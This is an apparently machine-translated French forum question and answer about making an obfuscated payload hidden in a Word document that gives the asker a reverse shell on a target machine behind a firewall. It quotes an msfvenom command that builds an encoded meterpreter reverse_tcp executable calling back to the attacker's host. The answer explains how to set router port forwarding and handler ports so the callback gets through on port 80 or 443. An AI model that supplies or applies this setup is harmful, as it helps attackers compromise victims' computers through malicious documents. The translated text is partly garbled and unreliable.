J'essaie de créer une charge utile pour insérer en tant que code obscurci dans un document Word, qui créera un auditeur sur la machine attaquée et permettra d'exécuter certaines commandes (pas via le fichier .exe comme indiqué dans des tons de vidéos)
Je suppose: la machine attaquée est derrière un pare-feu, qui bloque le trafic sortant, à l'exception du port 80 et 443. Je souhaite donc que la circulation de la machine attaquée soit transmise à ces ports. Je pourrais donc écouter et exécuter.
J'utilise Set Toolkit (à Kali), choisissez "Attaques d'ingénierie sociale" -> Vecteurs d'attaque PowerShell -> Injecteur de code shell alphanumérique.
Il incite à Lhost, qui est mon adresse IP publique, transmise à mon IP interne (je suis derrière le routeur).
Ensuite, il invite la situation et c'est tout.
Ma compréhension est la limite - port local, ce qui signifie port que je vais accepter le trafic provenant de la machine attaquée. Mais dans ce cas, comment puis-je spécifier un port sortant pour la machine attaquée?
Je voudrais une solution de compteur, si possible. Je m'en fiche si c'est un vecteur de PowerShell ou une autre, puisque la charge utile, si je comprends bien seulement ne s'ouvre que pour moi une possibilité d'écouter et d'exécuter des commandes sur la machine attaquée.
Sur une feuille de trichets de Sans Institute, j'ai trouvé une commande intéressante:
msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Ici, il semble que Lport soit introduit dans un fichier malveillant, mais dans ce cas, ce sera exactement ce dont j'ai besoin; un port pour le trafic sortant de la machine attaquée.
Vous allez devoir définir la situation deux valeurs différentes. Le port de la charge utile doit être le port que vous avez transféré sur le routeur (celui que vous pouvez accéder à l'extérieur). Le port sur l'exploit devrait être un port que votre machine d'attaque écoute, par exemple Port 4444.
Explication :
Depuis qu'un pare-feu permet uniquement à Port 80 et 443, vous devrez transmettre 80 ou 443 sur votre routeur au port 4444.
Pour cette explication, nous allons prendre le port 5555 lorsque le port s'ouvre sur le routeur et le port 4444 en écoutant le port de l'ordinateur attaquant. Pour faire face au pare-feu, vous devrez utiliser le port 80 ou 443 au lieu du port 5555.
Puisque vous faites cette attaque sur Internet et que vous avez transféré le port à votre machine d'attaque, vous pouvez envoyer des données d'un ordinateur sur un réseau différent de votre machine d'attaque. Cela ressemble à quelque chose comme ça:
Computer on another network -> Router (port 5555) -> attacking machine (port 4444)
Ainsi, puisque la charge utile est lancée à partir d'un autre réseau, le seul moyen de communiquer avec votre ordinateur d'attaque est sur le port 5555.
L'exploit/gestionnaire est en cours d'exécution sur votre machine attaquante qui se trouve sur votre propre réseau. Le port 4444 est à l'écoute des données qui a été acheminée d'un ordinateur externe, bien que votre routeur, et du port 4444. Pour cette raison, le LPORT pour l'exploiteur/gestionnaire est de 4444.